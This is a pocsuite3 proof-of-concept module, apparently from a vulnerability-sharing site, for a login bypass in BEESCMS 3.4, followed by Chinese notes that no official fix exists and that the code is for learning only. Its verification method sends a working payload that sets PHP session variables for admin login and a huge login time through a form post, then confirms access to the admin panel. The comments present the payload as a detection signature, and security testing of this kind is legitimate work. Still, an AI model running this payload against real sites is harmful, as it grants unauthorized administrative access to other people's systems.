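"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
For more information, please visit http://pocsuite.org
"""

from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
from pocsuite3.lib.utils import random_str
from requests.exceptions import ReadTimeout
from urllib.parse import urljoin


class DemoPOC(POCBase):
    """Verification check for the BEESCMS 3.4 admin login bypass (ssvid 1269).

    The check only reports whether the admin panel is served to a session that
    never logged in; ``_attack`` is the same check and ``_shell`` does nothing.
    """

    vulID = '1269'  # ssvid
    version = '1'
    author = ['chenghs@knownsec.com']
    vulDate = '2014-05-02'
    createDate = '2014-05-09'
    updateDate = '2014-05-09'
    references = ['http://www.wooyun.org/bugs/wooyun-2014-059180']
    # name, in English: "BEESCMS 3.4 /admin.php login bypass vulnerability POC"
    name = 'BEESCMS 3.4 /admin.php 登录绕过漏洞 POC'
    appPowerLink = 'http://www.beescms.com/'
    appName = 'BEESCMS'
    appVersion = 'v3.4#'
    vulType = 'Login Bypass'
    # desc, in English: when BEESCMS validates an admin login, a faulty
    # timestamp check allows the login to be bypassed.
    desc = ''' BEESCMS 在验证后台登陆时,由于时间戳判断错误,导致登陆绕过 '''
    samples = []
    install_requires = ['']

    def _verify(self):
        """Report the target as vulnerable if the admin panel is served unauthenticated.

        The same form body is posted to ``/index.php`` and then, within the
        same session, to ``/admin/admin.php``. The target is reported only
        when the second response contains both admin-panel link markers.

        Returns:
            The ``Output`` built by ``parse_output``. ``result`` stays empty,
            which yields a failure, when the markers are absent or when a
            request raises.
        """
        result = {}
        try:
            # Context manager so the session's pooled connections are released
            # even when one of the requests raises.
            with requests.Session() as s:
                index_url = urljoin(self.url, '/index.php')
                headers = {
                    'Content-Type': 'application/x-www-form-urlencoded',
                    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.52 Safari/537.17'
                }
                # The form fields are named like PHP session variables
                # (``_SESSION[...]``). NOTE(review): for defenders, request
                # parameters with that name prefix are a useful log/WAF
                # signature; the source page lists no official fix.
                data = '_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=300000000000000000000000\r\n'
                s.post(index_url, data=data, headers=headers)

                login_url = urljoin(self.url, '/admin/admin.php')
                resp = s.post(login_url, data=data, headers=headers)

                # Both links are required, so a page that merely mentions one
                # of them is not reported.
                if 'admin_form.php?action=form_list&nav=list_order' in resp.text and 'admin_main.php?nav=main' in resp.text:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = self.url
        except Exception as e:
            # Any request or parsing error is logged and treated as
            # "not vulnerable" because ``result`` is left empty.
            logger.error(str(e))
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap ``result`` in an ``Output``: success if non-empty, else failure."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _attack(self):
        """Run the same verification as ``_verify``; no separate attack mode exists."""
        return self._verify()

    def _shell(self):
        """Not implemented; returns ``None``."""


register_poc(DemoPOC)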
暂无官方解决方案
暂无防护方案
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负